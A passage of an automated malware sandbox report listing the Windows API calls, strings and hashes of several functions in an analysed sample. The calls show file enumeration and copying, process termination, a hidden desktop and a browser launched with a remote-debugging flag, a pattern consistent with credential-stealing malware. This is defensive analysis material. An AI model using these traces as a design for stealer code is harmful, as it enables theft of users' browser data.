                              • Part of subcall function 006ECAE0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 006ECB46
                              • Part of subcall function 006ECAE0: lstrcpyn.KERNEL32(?,?,00000104), ref: 006ECBC9
                            • CoUninitialize.COMBASE ref: 006ECD09
                            • lstrcat.KERNEL32(?,?), ref: 006ECD2E
                            • lstrlen.KERNEL32(?), ref: 006ECD3B
                            • StrCmpCA.SHLWAPI(?,006FCFEC), ref: 006ECD55
                            • wsprintfA.USER32 ref: 006ECD7D
                            • wsprintfA.USER32 ref: 006ECD9C
                            • PathMatchSpecA.SHLWAPI(?,?), ref: 006ECDB0
                            • wsprintfA.USER32 ref: 006ECDD8
                            • CopyFileA.KERNEL32(?,?,00000001), ref: 006ECDF1
                            • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 006ECE10
                            • GetFileSizeEx.KERNEL32(00000000,?), ref: 006ECE28
                            • CloseHandle.KERNEL32(00000000), ref: 006ECE33
                            • CloseHandle.KERNEL32(00000000), ref: 006ECE3F
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006ECE54
                            • lstrcpy.KERNEL32(00000000,?), ref: 006ECE94
                            • FindNextFileA.KERNEL32(?,?), ref: 006ECF8D
                            • FindClose.KERNEL32(?), ref: 006ECF9F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Filewsprintf$CloseFind$CreateHandleMatchPathSpeclstrcat$ByteCharCopyFirstInitializeInstanceMultiNextSizeUninitializeUnothrow_t@std@@@Wide__ehfuncinfo$??2@lstrcpylstrcpynlstrlen
                            • String ID: %s%s$%s\%s$%s\%s\%s$%s\*
                            • API String ID: 3860919712-2388001722
                            • Opcode ID: 6916119dc478e14d3a06367d878fb7740b20b397732d12d332e5f729f93ba98b
                            • Instruction ID: 1afe4b4bf0826ed40cc5761f5cebd4e46565356d7b2ffc60f745c5773ba0359b
                            • Opcode Fuzzy Hash: 6916119dc478e14d3a06367d878fb7740b20b397732d12d332e5f729f93ba98b
                            • Instruction Fuzzy Hash: A2C180B1A10359AFDB60DF65DC49EEE77BAFF44300F044599F609A7290EA30AA45CF90
                            Function 006E1269 Relevance: 43.8, APIs: 29, Instructions: 336stringfileCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006E1291
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E12B4
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006E12BF
                            • lstrlen.KERNEL32(00704CA8), ref: 006E12CA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E12E7
                            • lstrcat.KERNEL32(00000000,00704CA8), ref: 006E12F3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E131E
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 006E133A
                            • StrCmpCA.SHLWAPI(?,007017A0), ref: 006E135C
                            • StrCmpCA.SHLWAPI(?,007017A4), ref: 006E1376
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006E13AF
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E13D7
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006E13E2
                            • lstrlen.KERNEL32(00701794), ref: 006E13ED
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E140A
                            • lstrcat.KERNEL32(00000000,00701794), ref: 006E1416
                            • lstrlen.KERNEL32(?), ref: 006E1423
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1443
                            • lstrcat.KERNEL32(00000000,?), ref: 006E1451
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E147A
                            • StrCmpCA.SHLWAPI(?,0101DE70), ref: 006E14A3
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E14E4
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E150D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1535
                            • StrCmpCA.SHLWAPI(?,0101E798), ref: 006E1552
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E1593
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E15BC
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E15E4
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E1796
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E17BE
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E17F5
                            • FindNextFileA.KERNEL32(00000000,?), ref: 006E181C
                            • FindClose.KERNEL32(00000000), ref: 006E182B
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                            • String ID:
                            • API String ID: 1346933759-0
                            • Opcode ID: 5298e4d97aa6324298e25bece5b85ed8d0f98e41932f6ede3e9aa9c8c745867a
                            • Instruction ID: e22e176d838fec2d831591ae28673884b8cd7ab6f747824b51962b2f90307b74
                            • Opcode Fuzzy Hash: 5298e4d97aa6324298e25bece5b85ed8d0f98e41932f6ede3e9aa9c8c745867a
                            • Instruction Fuzzy Hash: 41C1CEB1A123169FCB61EF76DC99AEE77BAAF11300F044129F84A9B351DB30DD419B90
                            Function 006D9770 Relevance: 42.2, APIs: 21, Strings: 3, Instructions: 234stringsleepCOMMON
                            Download Yara Rule
                            APIs
                            • memset.MSVCRT ref: 006D9790
                            • lstrcat.KERNEL32(?,?), ref: 006D97A0
                            • lstrcat.KERNEL32(?,?), ref: 006D97B1
                            • lstrcat.KERNEL32(?, --remote-debugging-port=9229 --profile-directory="), ref: 006D97C3
                            • memset.MSVCRT ref: 006D97D7
                              • Part of subcall function 006F3E70: lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006F3EA5
                              • Part of subcall function 006F3E70: lstrcpy.KERNEL32(00000000,0101EAC0), ref: 006F3ECF
                              • Part of subcall function 006F3E70: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,006D134E,?,0000001A), ref: 006F3ED9
                            • wsprintfA.USER32 ref: 006D9806
                            • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 006D9827
                            • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 006D9844
                              • Part of subcall function 006F46A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 006F46B9
                              • Part of subcall function 006F46A0: Process32First.KERNEL32(00000000,00000128), ref: 006F46C9
                              • Part of subcall function 006F46A0: Process32Next.KERNEL32(00000000,00000128), ref: 006F46DB
                              • Part of subcall function 006F46A0: StrCmpCA.SHLWAPI(?,?), ref: 006F46ED
                              • Part of subcall function 006F46A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 006F4702
                              • Part of subcall function 006F46A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 006F4711
                              • Part of subcall function 006F46A0: CloseHandle.KERNEL32(00000000), ref: 006F4718
                              • Part of subcall function 006F46A0: Process32Next.KERNEL32(00000000,00000128), ref: 006F4726
                              • Part of subcall function 006F46A0: CloseHandle.KERNEL32(00000000), ref: 006F4731
                            • lstrcat.KERNEL32(00000000,?), ref: 006D9878
                            • lstrcat.KERNEL32(00000000,?), ref: 006D9889
                            • lstrcat.KERNEL32(00000000,00704B60), ref: 006D989B
                            • memset.MSVCRT ref: 006D98AF
                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 006D98D4
                            • lstrcpy.KERNEL32(00000000,?), ref: 006D9903
                            • StrStrA.SHLWAPI(00000000,0101F160), ref: 006D9919
                            • lstrcpyn.KERNEL32(009093D0,00000000,00000000), ref: 006D9938
                            • lstrlen.KERNEL32(?), ref: 006D994B
                            • wsprintfA.USER32 ref: 006D995B
                            • lstrcpy.KERNEL32(?,00000000), ref: 006D9971
                            • Sleep.KERNEL32(00001388), ref: 006D99E7
                              • Part of subcall function 006D1530: lstrcpy.KERNEL32(00000000,?), ref: 006D1557
                              • Part of subcall function 006D1530: lstrcpy.KERNEL32(00000000,?), ref: 006D1579
                              • Part of subcall function 006D1530: lstrcpy.KERNEL32(00000000,?), ref: 006D159B
                              • Part of subcall function 006D1530: lstrcpy.KERNEL32(00000000,?), ref: 006D15FF
                              • Part of subcall function 006D92B0: strlen.MSVCRT ref: 006D92E1
                              • Part of subcall function 006D92B0: strlen.MSVCRT ref: 006D92FA
                              • Part of subcall function 006D92B0: strlen.MSVCRT ref: 006D9399
                              • Part of subcall function 006D92B0: strlen.MSVCRT ref: 006D93E6
                              • Part of subcall function 006F4740: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 006F4759
                              • Part of subcall function 006F4740: Process32First.KERNEL32(00000000,00000128), ref: 006F4769
                              • Part of subcall function 006F4740: Process32Next.KERNEL32(00000000,00000128), ref: 006F477B
                              • Part of subcall function 006F4740: OpenProcess.KERNEL32(00000001,00000000,?), ref: 006F479C
                              • Part of subcall function 006F4740: TerminateProcess.KERNEL32(00000000,00000000), ref: 006F47AB
                              • Part of subcall function 006F4740: CloseHandle.KERNEL32(00000000), ref: 006F47B2
                              • Part of subcall function 006F4740: Process32Next.KERNEL32(00000000,00000128), ref: 006F47C0
                              • Part of subcall function 006F4740: CloseHandle.KERNEL32(00000000), ref: 006F47CB
                            • CloseDesktop.USER32(?), ref: 006D9A1C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Process32lstrcat$Close$HandleNextProcessstrlen$CreateDesktopOpenmemset$FirstSnapshotTerminateToolhelp32wsprintf$FolderPathSleepSystemTimelstrcpynlstrlen
                            • String ID: --remote-debugging-port=9229 --profile-directory="$%s%s$D
                            • API String ID: 958055206-1862457068
                            • Opcode ID: ccf62fae2f96a05f991857d14d1b611c5cd1a665bef155db25803ed1f4d9ccee
                            • Instruction ID: 641ceb7dab9619ebc6eb819f1b9eb5e37a4a11d6eafc992054873d63e3ccf34d
                            • Opcode Fuzzy Hash: ccf62fae2f96a05f991857d14d1b611c5cd1a665bef155db25803ed1f4d9ccee
                            • Instruction Fuzzy Hash: 8991A4B1A10218AFDB60DF74DC45FEE77B9EF44700F144199F609A7291DF70AA448BA4
                            Function 006EE210 Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 212stringfileCOMMON
                            Download Yara Rule
                            APIs
                            • wsprintfA.USER32 ref: 006EE22C
                            • FindFirstFileA.KERNEL32(?,?), ref: 006EE243
                            • StrCmpCA.SHLWAPI(?,007017A0), ref: 006EE263
                            • StrCmpCA.SHLWAPI(?,007017A4), ref: 006EE27D
                            • wsprintfA.USER32 ref: 006EE2A2
                            • StrCmpCA.SHLWAPI(?,006FCFEC), ref: 006EE2B4
                            • wsprintfA.USER32 ref: 006EE2D1
                              • Part of subcall function 006EEDE0: lstrcpy.KERNEL32(00000000,?), ref: 006EEE12
                            • wsprintfA.USER32 ref: 006EE2F0
                            • PathMatchSpecA.SHLWAPI(?,?), ref: 006EE304
                            • lstrcat.KERNEL32(?,0101FC40), ref: 006EE335
                            • lstrcat.KERNEL32(?,00701794), ref: 006EE347
                            • lstrcat.KERNEL32(?,?), ref: 006EE358
                            • lstrcat.KERNEL32(?,00701794), ref: 006EE36A
                            • lstrcat.KERNEL32(?,?), ref: 006EE37E
                            • CopyFileA.KERNEL32(?,?,00000001), ref: 006EE394
                            • lstrcpy.KERNEL32(00000000,?), ref: 006EE3D2
                            • lstrcpy.KERNEL32(00000000,?), ref: 006EE422
                            • DeleteFileA.KERNEL32(?), ref: 006EE45C
                              • Part of subcall function 006D1530: lstrcpy.KERNEL32(00000000,?), ref: 006D1557
                              • Part of subcall function 006D1530: lstrcpy.KERNEL32(00000000,?), ref: 006D1579
                              • Part of subcall function 006D1530: lstrcpy.KERNEL32(00000000,?), ref: 006D159B
                              • Part of subcall function 006D1530: lstrcpy.KERNEL32(00000000,?), ref: 006D15FF
                            • FindNextFileA.KERNEL32(00000000,?), ref: 006EE49B
                            • FindClose.KERNEL32(00000000), ref: 006EE4AA
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                            • String ID: %s\%s$%s\*
                            • API String ID: 1375681507-2848263008
                            • Opcode ID: 26e3639c51a91b2af2c1a00046e02ae32f243ffd4b82d685e2cc9aa99fff4b94
                            • Instruction ID: f38697309fd1f032fd302f1b2469a8886ef0ab6ac554aa89f8abad0997d5a756
                            • Opcode Fuzzy Hash: 26e3639c51a91b2af2c1a00046e02ae32f243ffd4b82d685e2cc9aa99fff4b94
                            • Instruction Fuzzy Hash: 358191B1914219DFCB20EF75DC49AEF77BABF54300F044599B64A93281EB35AA44CFA0
                            Function 006D16B9 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 219stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006D16E2
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006D1719
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D176C
                            • lstrcat.KERNEL32(00000000), ref: 006D1776
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D17A2
                            • lstrcpy.KERNEL32(00000000,?), ref: 006D18F3
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006D18FE
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat
                            • String ID: \*.*
                            • API String ID: 2276651480-1173974218
                            • Opcode ID: 56142eeeabdf7ceb651c9b68314137d42d3e08cbb425599e7966ed8a4f6cac6b
                            • Instruction ID: 201e77eff770a35762372a472ae501a212e47220aa96ff4220d5061275d5e6e0
                            • Opcode Fuzzy Hash: 56142eeeabdf7ceb651c9b68314137d42d3e08cbb425599e7966ed8a4f6cac6b
                            • Instruction Fuzzy Hash: 02818270D1521AAFCB61EF65D9A5AEE77B6EF11300F08112AF805AF362CB709D01CB91
                            Function 006EDD30 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 171stringfilememoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 006EDD45
                            • RtlAllocateHeap.NTDLL(00000000), ref: 006EDD4C
                            • wsprintfA.USER32 ref: 006EDD62
                            • FindFirstFileA.KERNEL32(?,?), ref: 006EDD79
                            • StrCmpCA.SHLWAPI(?,007017A0), ref: 006EDD9C
                            • StrCmpCA.SHLWAPI(?,007017A4), ref: 006EDDB6
                            • wsprintfA.USER32 ref: 006EDDD4
                            • DeleteFileA.KERNEL32(?), ref: 006EDE20
                            • CopyFileA.KERNEL32(?,?,00000001), ref: 006EDDED
                              • Part of subcall function 006D1530: lstrcpy.KERNEL32(00000000,?), ref: 006D1557
                              • Part of subcall function 006D1530: lstrcpy.KERNEL32(00000000,?), ref: 006D1579
                              • Part of subcall function 006D1530: lstrcpy.KERNEL32(00000000,?), ref: 006D159B
                              • Part of subcall function 006D1530: lstrcpy.KERNEL32(00000000,?), ref: 006D15FF
                              • Part of subcall function 006ED980: memset.MSVCRT ref: 006ED9A1
                              • Part of subcall function 006ED980: memset.MSVCRT ref: 006ED9B3
                              • Part of subcall function 006ED980: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 006ED9DB
                              • Part of subcall function 006ED980: lstrcpy.KERNEL32(00000000,?), ref: 006EDA0E
                              • Part of subcall function 006ED980: lstrcat.KERNEL32(?,00000000), ref: 006EDA1C
                              • Part of subcall function 006ED980: lstrcat.KERNEL32(?,0101F190), ref: 006EDA36
                              • Part of subcall function 006ED980: lstrcat.KERNEL32(?,?), ref: 006EDA4A
                              • Part of subcall function 006ED980: lstrcat.KERNEL32(?,0101DC48), ref: 006EDA5E
                              • Part of subcall function 006ED980: lstrcpy.KERNEL32(00000000,?), ref: 006EDA8E
                              • Part of subcall function 006ED980: GetFileAttributesA.KERNEL32(00000000), ref: 006EDA95
                            • FindNextFileA.KERNEL32(00000000,?), ref: 006EDE2E
                            • FindClose.KERNEL32(00000000), ref: 006EDE3D
                            • lstrcat.KERNEL32(?,0101FC40), ref: 006EDE66
                            • lstrcat.KERNEL32(?,0101E838), ref: 006EDE7A
                            • lstrlen.KERNEL32(?), ref: 006EDE84
                            • lstrlen.KERNEL32(?), ref: 006EDE92
                            • lstrcpy.KERNEL32(00000000,?), ref: 006EDED2
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$File$Find$Heaplstrlenmemsetwsprintf$AllocateAttributesCloseCopyDeleteFirstFolderNextPathProcess
                            • String ID: %s\%s$%s\*
                            • API String ID: 4184593125-2848263008
                            • Opcode ID: e11bed744071b09273504407ccdc4f11717ac350ffbfe04871e989a137e5eb27
                            • Instruction ID: e090a9a7858dc0671e394528fb76b8bae55b9b281429846b0b0cea66bdbb0231
                            • Opcode Fuzzy Hash: e11bed744071b09273504407ccdc4f11717ac350ffbfe04871e989a137e5eb27
                            • Instruction Fuzzy Hash: C66193B1A10219AFCB20EF74DC49AEE77BAFF58300F0445A9B645D7391DB34AA44CB90
                            Function 006ED530 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 183stringfileCOMMON
                            Download Yara Rule
                            APIs
                            • wsprintfA.USER32 ref: 006ED54D
                            • FindFirstFileA.KERNEL32(?,?), ref: 006ED564
                            • StrCmpCA.SHLWAPI(?,007017A0), ref: 006ED584
                            • StrCmpCA.SHLWAPI(?,007017A4), ref: 006ED59E
                            • lstrcat.KERNEL32(?,0101FC40), ref: 006ED5E3
                            • lstrcat.KERNEL32(?,0101FAF0), ref: 006ED5F7
                            • lstrcat.KERNEL32(?,?), ref: 006ED60B
                            • lstrcat.KERNEL32(?,?), ref: 006ED61C
                            • lstrcat.KERNEL32(?,00701794), ref: 006ED62E
                            • lstrcat.KERNEL32(?,?), ref: 006ED642
                            • lstrcpy.KERNEL32(00000000,?), ref: 006ED682
                            • lstrcpy.KERNEL32(00000000,?), ref: 006ED6D2
                            • FindNextFileA.KERNEL32(00000000,?), ref: 006ED737
